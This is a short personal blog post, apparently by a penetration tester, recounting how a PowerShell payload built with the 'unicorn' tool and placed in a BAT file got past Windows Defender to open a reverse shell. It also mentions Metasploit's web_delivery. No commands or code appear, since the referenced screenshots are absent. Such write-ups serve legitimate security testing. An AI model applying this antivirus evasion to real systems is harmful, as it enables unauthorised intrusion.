poniedziałek, 24 grudnia 2018

Pentesting AD - we the user

Last time we enumerated enough to be 'the user', so today we will start from this point: we are the user - logged in. Here we go...
Main reason to write about it was that I found cool idea to 'bypass' Windows Defender installed with Windows 10. I mean I found it on github ;) Kudos for the author!

Nothing new but maybe you'll find it useful during your pentest(s) ;) Some details for my case:

(...was: normaly I will use RDP to connect to the target and 'add my disk' to the connection. Then you can copy/paste your payload.exe/.ps1... but this time it wasn't possible, so...)


With Windows Defender enabled (by default afaik) I wasn't able to run meterpreter-based payload prepared with Metasploit.



I wasn't sure why (probably my mistake or misunderstood about this or that...) so I googled a bit and found tool called unicorn:


I prepared powershell-payload with unicorn and saved in on target machine in BAT file:


And now we can see some results:


As you can see there is a green-screen so we are safe. ;]

After few seconds there should be another nice screen:


...and now - you are already (reverse_sh) connected, or, user will click anything (ok/cancel) and revshell will be connected. No matther what - you should already received reverse shell.

I googled a bit more and found a cool idea (pretty similar to the one used in unicorn) - web_delivery described on Offensive Security web page.

Checking:


Maybe you will find it useful too:



Cheers






Brak komentarzy:

Prześlij komentarz